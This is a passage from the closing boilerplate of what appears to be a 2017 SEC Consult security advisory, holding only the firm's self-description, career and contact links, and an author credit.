 of new offensive and defensive technologies for our customers. Hence our
 customers obtain the most current information about vulnerabilities and valid
 recommendation about the risk profile of new technologies.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Interested to work with the experts of SEC Consult?
 Send us your application https://www.sec-consult.com/en/Career.htm
 Interested in improving your cyber security with the experts of SEC Consult? 
 Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Mail: research at sec-consult dot com
 Web: https://www.sec-consult.com
 Blog: http://blog.sec-consult.com
 Twitter: https://twitter.com/sec_consult
 EOF Pichaya Morimoto / @2017